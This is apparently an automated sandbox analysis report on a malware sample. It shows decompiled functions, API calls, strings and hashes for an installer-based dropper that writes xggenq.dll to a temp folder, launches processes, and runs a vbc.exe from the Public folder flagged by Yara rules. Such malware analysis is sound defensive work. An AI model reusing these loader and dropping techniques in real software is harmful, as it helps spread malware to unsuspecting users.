                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ClearVariant__wassert
                                                  • String ID: not disp %s$not supported type: %s
                                                  • API String ID: 2068627426-167845526
                                                  • Opcode ID: c1fb66b12f4e7316f2949895ddcd6672e5d91881878a0116a5da32ef76059a11
                                                  • Instruction ID: 3f2bed55a94ec5b540fa0df4a40d6dcae19cb0584c614fb1fbb3147cfebd7898
                                                  • Opcode Fuzzy Hash: c1fb66b12f4e7316f2949895ddcd6672e5d91881878a0116a5da32ef76059a11
                                                  • Instruction Fuzzy Hash: 6A2150BAA00108EFDB04CBA4D994F6E73FAEF84604F248094F90A9B345E331DE40DB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73055760, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 21%
                                                  			E73055760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _t31;
				intOrPtr* _t43;

				_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 4)) + 8));
				0x73050000("\n");
				_v8 = E73051730(__ebx, __edi, __esi, _a4, _v12, 1,  &_v24);
				if(_v8 >= 0) {
					if(_v24 == 2) {
						_push( &_v40);
						_push(_v20);
						_t31 = E73051C90(_a4, 0);
						_push(_t31);
						L73055D49();
						_v8 = _t31;
						if(_v8 >= 0) {
							__imp__#9(_v20);
							_t43 = _v20;
							 *_t43 = _v40;
							 *((intOrPtr*)(_t43 + 4)) = _v36;
							 *((intOrPtr*)(_t43 + 8)) = _v32;
							 *((intOrPtr*)(_t43 + 0xc)) = _v28;
							return 0;
						}
						return _v8;
					}
					0x73050000("ref.type is not REF_VAR\n");
					return 0x80004005;
				}
				return _v8;
			}













                                                  0x7305576f
                                                  0x73055777
                                                  0x73055795
                                                  0x7305579c
                                                  0x730557a7
                                                  0x730557c0
                                                  0x730557c4
                                                  0x730557cb
                                                  0x730557d3
                                                  0x730557d4
                                                  0x730557d9
                                                  0x730557e0
                                                  0x730557eb
                                                  0x730557f1
                                                  0x730557f7
                                                  0x730557fc
                                                  0x73055802
                                                  0x73055808
                                                  0x00000000
                                                  0x7305580b
                                                  0x00000000
                                                  0x730557e2
                                                  0x730557ae
                                                  0x00000000
                                                  0x730557b6
                                                  0x00000000

                                                  Strings
                                                  • ref.type is not REF_VAR, xrefs: 730557A9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ref.type is not REF_VAR
                                                  • API String ID: 0-2956374754
                                                  • Opcode ID: 22b9e09dabaf0e8f1119fdff4723edd9639d38f4f2eab59b0edf254a5a69a576
                                                  • Instruction ID: 01a83c87f4a51ffc2ee40b8f00ea0f01642fbc8e2fbc50073845220a671f203d
                                                  • Opcode Fuzzy Hash: 22b9e09dabaf0e8f1119fdff4723edd9639d38f4f2eab59b0edf254a5a69a576
                                                  • Instruction Fuzzy Hash: 9221FCB9D00208EFDB04DF94D945FAEB7F5AB88704F108499F809AB241E331AA45CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                                                  0x00404de0
                                                  0x00404e05
                                                  0x00404e25
                                                  0x00404e28
                                                  0x00404e2b
                                                  0x00404e42
                                                  0x00404e48
                                                  0x00404e4f
                                                  0x00404e56
                                                  0x00404e5d
                                                  0x00404e62
                                                  0x00404e68
                                                  0x00000000
                                                  0x00404e78
                                                  0x00404e12
                                                  0x00404e65
                                                  0x00404e65
                                                  0x00000000
                                                  0x00404e65
                                                  0x00404e1e
                                                  0x00404e20
                                                  0x00000000
                                                  0x00404e20
                                                  0x00404de6
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ded
                                                  0x00000000

                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00404E0A
                                                  • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E78
                                                    • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                  • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                                  • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                  • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\Albus\AppData\Local\Temp\nskF049.tmp\xggenq.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                  0x004024f1
                                                  0x004024f1
                                                  0x004024f4
                                                  0x0040250f
                                                  0x004024f6
                                                  0x004024f8
                                                  0x004024fd
                                                  0x00402504
                                                  0x00402516
                                                  0x0040268f
                                                  0x0040268f
                                                  0x0040251c
                                                  0x0040252e
                                                  0x004015a6
                                                  0x004015a8
                                                  0x00000000
                                                  0x004015ae
                                                  0x004015a8
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                  • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nskF049.tmp\xggenq.dll,00000000,?), ref: 0040252E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nskF049.tmp\xggenq.dll, xrefs: 004024FD, 00402522
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileWritelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nskF049.tmp\xggenq.dll
                                                  • API String ID: 427699356-4016793881
                                                  • Opcode ID: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                                  • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                                                  • Opcode Fuzzy Hash: 5c36ca9ac26024871935510d0a87e67fb519006a7f000f4bdfc66cd9c3aad0f4
                                                  • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73051C40, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E73051C40(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _t12;
				void* _t19;
				void* _t23;
				void* _t26;
				void* _t27;

				_t12 = _a4;
				_t30 =  *((intOrPtr*)(_t12 + 0x40));
				if( *((intOrPtr*)(_t12 + 0x40)) == 0) {
					_push(0x286);
					E73055DA9(_t19, _t23, _t26, _t27, _t30, L"ctx->top", L"C:\\xampp\\htdocs\\Loct\\87441519555141b6935f4940bcbda0c2\\Loader\\Project4\\Project4\\Source.c");
				}
				_v8 =  *((intOrPtr*)(_a4 + 0x40)) - 1;
				 *((intOrPtr*)(_a4 + 0x40)) = _v8;
				return (_v8 << 4) +  *((intOrPtr*)(_a4 + 0x44));
			}









                                                  0x73051c44
                                                  0x73051c47
                                                  0x73051c4b
                                                  0x73051c4d
                                                  0x73051c5c
                                                  0x73051c61
                                                  0x73051c6d
                                                  0x73051c76
                                                  0x73051c88

                                                  APIs
                                                  • __wassert.LIBCMT ref: 73051C5C
                                                    • Part of subcall function 73055DA9: GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 73055E6E
                                                    • Part of subcall function 73055DA9: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 73055E9A
                                                  Strings
                                                  • ctx->top, xrefs: 73051C57
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 73051C52
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Module$FileHandleName__wassert
                                                  • String ID: C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$ctx->top
                                                  • API String ID: 1832359313-2059359536
                                                  • Opcode ID: af2d32679b7192b4309171c75c84d237b5c1b900e9a7e52a3d3e1db332d713d2
                                                  • Instruction ID: a65beb4350989427169a3ff80103bcf57e20d0cc7c4cb69fe325ddfc85028522
                                                  • Opcode Fuzzy Hash: af2d32679b7192b4309171c75c84d237b5c1b900e9a7e52a3d3e1db332d713d2
                                                  • Instruction Fuzzy Hash: D1F0AC75A00208EFDB14CF48C545E597BB5FB84654F104298FD499F345E772EA41CB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                  0x00405401
                                                  0x0040541d
                                                  0x00405425
                                                  0x0040542a
                                                  0x00000000
                                                  0x00405430
                                                  0x00405434

                                                  APIs
                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                                  • CloseHandle.KERNEL32(?), ref: 0040542A
                                                  Strings
                                                  • Error launching installer, xrefs: 0040540B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                  • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                                  • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                  • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73051C90, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E73051C90(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t9;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t9 = _a4;
				_t25 =  *((intOrPtr*)(_t9 + 0x40)) - _a8;
				if( *((intOrPtr*)(_t9 + 0x40)) < _a8) {
					_push(0x28c);
					E73055DA9(_t17, _t20, _t21, _t22, _t25, L"ctx->top >= n", L"C:\\xampp\\htdocs\\Loct\\87441519555141b6935f4940bcbda0c2\\Loader\\Project4\\Project4\\Source.c");
				}
				return ( *((intOrPtr*)(_a4 + 0x40)) - _a8 - 1 << 4) +  *((intOrPtr*)(_a4 + 0x44));
			}








                                                  0x73051c93
                                                  0x73051c99
                                                  0x73051c9c
                                                  0x73051c9e
                                                  0x73051cad
                                                  0x73051cb2
                                                  0x73051ccb

                                                  APIs
                                                  • __wassert.LIBCMT ref: 73051CAD
                                                    • Part of subcall function 73055DA9: GetModuleHandleExW.KERNEL32(00000006,00000000,?), ref: 73055E6E
                                                    • Part of subcall function 73055DA9: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 73055E9A
                                                  Strings
                                                  • ctx->top >= n, xrefs: 73051CA8
                                                  • C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c, xrefs: 73051CA3
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Module$FileHandleName__wassert
                                                  • String ID: C:\xampp\htdocs\Loct\87441519555141b6935f4940bcbda0c2\Loader\Project4\Project4\Source.c$ctx->top >= n
                                                  • API String ID: 1832359313-1107961586
                                                  • Opcode ID: fbb77aa1371055d5e061d484dd4b0e60264f9b9ff1ebbeac5b8804954b023777
                                                  • Instruction ID: 11469fc428357669a8242836b39ded9bf5f2086db0b067c5ca31cec509af8202
                                                  • Opcode Fuzzy Hash: fbb77aa1371055d5e061d484dd4b0e60264f9b9ff1ebbeac5b8804954b023777
                                                  • Instruction Fuzzy Hash: 67E04F35200108EFDB04CF5CC489E9D3B64AB44A54B008154FD5A8F242D732F900CA84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                                                  0x00403557
                                                  0x0040355f
                                                  0x00403566
                                                  0x00403569
                                                  0x00403569
                                                  0x0040356b
                                                  0x00403570
                                                  0x00403577
                                                  0x0040357d
                                                  0x00403581
                                                  0x00403582
                                                  0x0040358a

                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                                  • GlobalFree.KERNEL32(?), ref: 00403577
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-4017390910
                                                  • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                  • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                                  • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                  • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                  0x004056d3
                                                  0x004056dd
                                                  0x004056df
                                                  0x004056e6
                                                  0x004056ee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004056ee
                                                  0x004056f0
                                                  0x004056f5

                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402CC1,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 004056D8
                                                  • CharPrevA.USER32(80000000,00000000), ref: 004056E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\Public
                                                  • API String ID: 2709904686-2272764151
                                                  • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                  • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                                  • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                  • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                  0x004057f0
                                                  0x004057f2
                                                  0x0040581a
                                                  0x004057ff
                                                  0x00405804
                                                  0x0040580f
                                                  0x00000000
                                                  0x0040582c
                                                  0x00405818
                                                  0x00405818
                                                  0x00000000

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                                  • CharNextA.USER32(00000000), ref: 00405812
                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                  • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                                  • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                  • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Analysis Process: vbc.exe PID: 1868 Parent PID: 2856 vbc.exeCOMMON

                                                  Executed Functions

                                                  Function 0041868A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E0041868A(void* __eax, intOrPtr _a8, char _a12, void* _a13, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, char _a44) {
				void* _t20;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t15 = _a8;
				_t31 = _a8 + 0xc48;
				E004191E0(_t29, _a8, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t5 =  &_a44; // 0x413a31
				_t7 =  &_a36; // 0x413d72
				_t13 =  &_a12; // 0x413d72
				_t20 =  *((intOrPtr*)( *_t31))( *_t13, _a16, _a20, _a24, _a28, _a32,  *_t7, _a40,  *_t5, _t30, _t33); // executed
				return _t20;
			}








                                                  0x00418693
                                                  0x0041869f
                                                  0x004186a7
                                                  0x004186ac
                                                  0x004186b2
                                                  0x004186cd
                                                  0x004186d5
                                                  0x004186d9

                                                  APIs
                                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507790702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1:A$r=A$r=A
                                                  • API String ID: 2738559852-4243674446
                                                  • Opcode ID: 3b253dfa8286f34b7ec512fa65b787f1b04f9b5a5aa728a5ab3fc4ee24236f80
                                                  • Instruction ID: 82bce7e08398e570ef2df0391ab6e90aa6b761e25cc3ddef6c36acc0221eb28d
                                                  • Opcode Fuzzy Hash: 3b253dfa8286f34b7ec512fa65b787f1b04f9b5a5aa728a5ab3fc4ee24236f80
                                                  • Instruction Fuzzy Hash: F1F0F4B2200508AFCB14CF89DD81EEB77ADEF8C354F158249FA0DA7650C630E951CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
